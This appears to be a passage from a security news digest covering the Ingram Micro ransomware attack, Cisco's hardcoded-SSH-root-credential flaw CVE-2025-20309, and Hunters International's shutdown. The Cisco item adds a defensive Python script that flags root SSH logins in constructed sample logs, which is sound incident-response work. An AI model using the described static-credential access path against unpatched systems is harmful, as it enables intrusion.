The company's initial response involved proactively taking certain systems offline and implementing other mitigation measures to secure the environment. Leading cybersecurity experts were engaged to assist with the investigation, and law enforcement was notified. Ingram Micro said that internal alerts, investigation protocols, and communications with key clients and stakeholders were initiated immediately, and it released a public statement on the incident.

Sources indicate that the SafePay ransomware group gained access through Ingram Micro's GlobalProtect VPN platform. The attack has impacted various systems, including the company's AI-powered Xvantage distribution platform and the Impulse license provisioning platform, leading to shipment backlogs and licensing interruptions across platforms such as Microsoft 365 and Dropbox. While it remains unclear if data was encrypted, the ransomware note claimed to have stolen various types of information. As a result, Ingram Micro's customers may experience delays as the company focuses on restoring its systems.

Recommended read:
References :
  • bsky.app: BleepingComputer reports on Ingram Micro experiencing a global outage impacting websites and internal systems.
  • Talkback Resources: BleepingComputer reports that an ongoing outage at IT giant Ingram Micro is caused by a SafePay ransomware attack.
  • Rescana: Ingram Micro Legacy Systems Outage: How the SafePay Ransomware Attack Disrupted Global Supply Chain Operations
  • nerds.xyz: Ingram Micro admits ransomware attack disrupted its systems and delayed shipments
  • The Register - Security: Ingram Micro confirms ransomware behind multi-day outage
  • Talkback Resources: Ingram Micro suffers global outage as internal systems inaccessible
  • Talkback Resources: Ingram Micro confirms ransomware behind multi-day outage
  • Blog: IT provider Ingram Micro hit by SafePay ransomware
  • techcrunch.com: Ingram Micro says ongoing outage caused by ransomware attack
  • Metacurity: IT giant Ingram Micro's systems shut down after SafePay ransomware attack
  • www.cybersecuritydive.com: Ingram Micro investigating ransomware attack
  • MicroScope: Ingram Micro hit by ransomware attack
  • www.itpro.com: Everything we know about the Ingram Micro cyber attack so far
  • www.metacurity.com: IT giant Ingram Micro's systems shut down after SafePay ransomware attack
  • www.it-daily.net: Serious hacker attack: Ingram Micro confirms ransomware
  • MicroScope: Ingram Micro ransomware attack contained and remediated
  • The Register - Software: Ingram Micro restarts orders – for some – following ransomware attack
  • Malware ? Graham Cluley: Ingram Micro confirms it has been hit by ransomware
  • cyberpress.org: Ingram Micro Recovers Operations Following Disruptive Ransomware Attack
  • www.cybersecuritydive.com: Ingram Micro restores global operations following hack

@sec.cloudapps.cisco.com //
Cisco is urging immediate action following the discovery of a critical vulnerability, CVE-2025-20309, in its Unified Communications Manager (Unified CM) and Unified Communications Manager Session Management Edition (Unified CM SME). The flaw stems from hardcoded SSH root credentials that cannot be modified or removed, allowing any remote attacker who can reach the SSH service to log in as root. It carries the maximum CVSS score of 10.0, reflecting unauthenticated, network-reachable exploitation with complete loss of confidentiality, integrity, and availability on the affected node.

Cisco's security advisory specifies that all Engineering Special (ES) releases from 15.0.1.13010-1 through 15.0.1.13017-1 are vulnerable, regardless of optional features in use. An unauthenticated remote attacker can exploit this vulnerability by utilizing the static root account credentials to establish SSH connections to vulnerable systems. Once authenticated, the attacker gains complete administrative control over the affected device, enabling the execution of arbitrary commands with root privileges.

There are no workarounds. To remediate the vulnerability, administrators are advised to upgrade to version 15SU3 or apply the CSCwp27755 patch file. Cisco found the flaw through internal testing and reports no evidence of exploitation in the wild, but because the credential is static and cannot be rotated, every unpatched node is exposed to anyone who can reach its SSH port, so restricting that reachability is the only stopgap until the fix is applied. Cisco's advisory also gives an indicator of compromise: a successful login as root is recorded in /var/log/active/syslog/secure, which can be retrieved from the appliance CLI with `file get activelog syslog/secure` and should be reviewed on every node that ran a vulnerable ES build.
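
Reviewing that log comes down to finding accepted root logins and noting who has been trying. The block below is an added example written for this page, not Cisco tooling: the log lines are constructed in generic OpenSSH sshd format (the appliance's syslog/secure prefix may differ, so adjust the regex to what `file get` returns), and the optional allowlist covers jump hosts from which root access is expected, if any.

```python
import re

# Constructed sample in generic OpenSSH sshd format; not captured from a Unified CM node.
SAMPLE_SECURE_LOG = """\
Jul 10 02:14:07 ucm-node1 sshd[2213]: Accepted password for root from 203.0.113.45 port 51234 ssh2
Jul 10 02:14:09 ucm-node1 sshd[2213]: pam_unix(sshd:session): session opened for user root by (uid=0)
Jul 10 08:31:55 ucm-node1 sshd[3407]: Accepted publickey for admin from 10.1.20.7 port 40022 ssh2: RSA SHA256:abc
Jul 10 09:02:11 ucm-node1 sshd[3599]: Failed password for root from 198.51.100.9 port 60101 ssh2
Jul 10 09:02:15 ucm-node1 sshd[3599]: Failed password for root from 198.51.100.9 port 60102 ssh2
"""

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_auth(log_text: str):
    """Yield one dict per sshd authentication line; other lines are ignored."""
    for line in log_text.splitlines():
        match = AUTH_RE.match(line)
        if match:
            yield match.groupdict()


def audit_root_ssh(log_text: str, allowed_sources=()) -> dict:
    """Accepted root logins from outside the allowlist are incidents on a node whose root
    password is hardcoded; failed root attempts show who is probing for it."""
    accepted, failed = [], []
    for event in parse_auth(log_text):
        if event["user"] != "root":
            continue
        if event["result"] == "Accepted" and event["ip"] not in allowed_sources:
            accepted.append((event["ts"], event["method"], event["ip"]))
        elif event["result"] == "Failed":
            failed.append((event["ts"], event["ip"]))
    return {"accepted_root": accepted, "failed_root": failed}


if __name__ == "__main__":
    report = audit_root_ssh(SAMPLE_SECURE_LOG)
    for ts, method, ip in report["accepted_root"]:
        print(f"ROOT LOGIN {ts} via {method} from {ip}")
    for ts, ip in report["failed_root"]:
        print(f"root attempt {ts} from {ip}")
```

One accepted password login for root from an unexpected address is the finding that matters; the publickey login for the admin account and the failed attempts are context. Retrieve the log from every node before patching, since the patch does not rewrite history.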

Recommended read:
References :
  • MeatMutts: Cisco Urges Immediate Action After Discovering Backdoor in Unified Communications Manager
  • infosec.exchange: : Unified Communications Manager systems could allow remote attackers to gain root-level access. The vulnerability CVE-2025-20309 with a maximum CVSS 10.0, stems from hardcoded SSH root credentials that cannot be modified or removed: 👇
  • Rescana: Critical Cisco Unified CM Vulnerability: Root Access via Static Credentials – Technical Analysis & Mitigation Strategies
  • cybersecuritynews.com: Unified Communications Manager systems could allow remote attackers to gain root-level access. The vulnerability CVE-2025-20309 with a maximum CVSS 10.0, stems from hardcoded SSH root credentials that cannot be modified or removed:
  • hackread.com: Cisco Issues Emergency Fix for Critical Root Credential Flaw in Unified CM
  • thecyberexpress.com: Cisco Issues Urgent Patch for Critical Unified CM Vulnerability (CVE-2025-20309)
  • Arctic Wolf: CVE-2025-20309: Cisco Unified Communications Manager Static SSH Credentials Maximum Severity Vulnerability
  • arcticwolf.com: CVE-2025-20309: Cisco Unified Communications Manager Static SSH Credentials Maximum Severity Vulnerability
  • sec.cloudapps.cisco.com: Security advisory from Cisco addressing the vulnerability.
  • The Register - Security: Cisco scores a perfect 10 - sadly for a critical flaw in its comms platform
  • nvd.nist.gov: Details of the Cisco vulnerability CVE-2025-20309.

@www.bleepingcomputer.com //
The Hunters International ransomware operation has announced its shutdown, stating they will release free decryption keys to their past victims. The group made the announcement on its dark web leak site, removing all previous victim data. In a statement, Hunters International acknowledged the impact their actions have had on organizations, stating the decision to close down was not made lightly. Victims are instructed to visit the ransomware gang's website to obtain the decryption keys and recovery guidance, though some sources indicate victims need to log in to a portal mentioned in the ransom note using existing credentials to obtain the decryption software.

The move to shut down has been met with skepticism from the threat intel community. Several ransomware gangs have released their victims' decryption keys and then shut down, each for different reasons. Some shut down only to return under a new name, perhaps in an attempt to confuse researchers and law enforcement agencies and sometimes to escape sanctions. There is speculation that Hunters International may be rebranding and transitioning to new infrastructure to avoid increased scrutiny from law enforcement. It emerged in late 2023 and was flagged by security researchers and ransomware experts as a potential rebrand of Hive, which had its infrastructure seized earlier that year.

Reports indicate that Hunters International launched a separate platform named "World Leaks" in January, advising its affiliates to switch to this new operation. At the time, the group claimed that encryption-based ransomware was no longer profitable and that it would be shifting to a hack-and-extort model. However, some sources have found World Leaks victims who also had ransomware deployed on their networks. Hunters International has been linked to almost 300 attacks worldwide, including India's Tata Technologies and the US Marshals Service, and has earned millions in cryptocurrency.

References:
  • infosec.exchange: NEW: The ransomware gang called Hunters International says it's shutting down and giving victims free decryption tools. “This decision was not made lightly, and we recognize the impact it has on the organizations we have interacted with,
  • Risky.Biz: Risky Bulletin: Hunters International ransomware shuts down and releases decryption keys
  • Risky Business Media: Risky Bulletin: Hunters International ransomware shuts down, releases decryption keys
  • techcrunch.com: Ransomware gang Hunters International says it’s shutting down
  • www.bleepingcomputer.com: Hunters International ransomware shuts down, releases free decryptors
  • Talkback Resources: Hunters International Ransomware Gang Rebrands as World Leaks
  • www.bitdefender.com: Hunters International ransomware group shuts down – but will it regroup under a new guise?
  • techcrunch.com: NEW: The ransomware gang called Hunters International says it's shutting down and giving victims free decryption tools.
  • The Register - Security: Another news article covering Hunters International's shutdown.
  • Graham Cluley: Mastodon post discussing the Hunters International shutdown and possible rebranding.
  • slcyber.io: Blog post discussing the shutdown and potential rebranding of the Hunters International ransomware group.
  • bsky.app: Ransomware crew Hunters International shuts down, hands out keys to victims. Could law enforcement ops be having an impact on criminal confidence?
  • www.itpro.com: A prolific ransomware group says it’s shutting down and giving out free decryption keys to victims – but cyber experts warn it's not exactly a 'gesture of goodwill'
  • news.risky.biz: Risky Bulletin: Hunters International ransomware shuts down and releases decryption keys
  • securityaffairs.com: Hunters International ransomware gang shuts down and offers free decryption keys to all victims
  • WeLiveSecurity: WeLiveSecurity reports Hunters International ransomware group shuts down – but will it regroup under a new guise?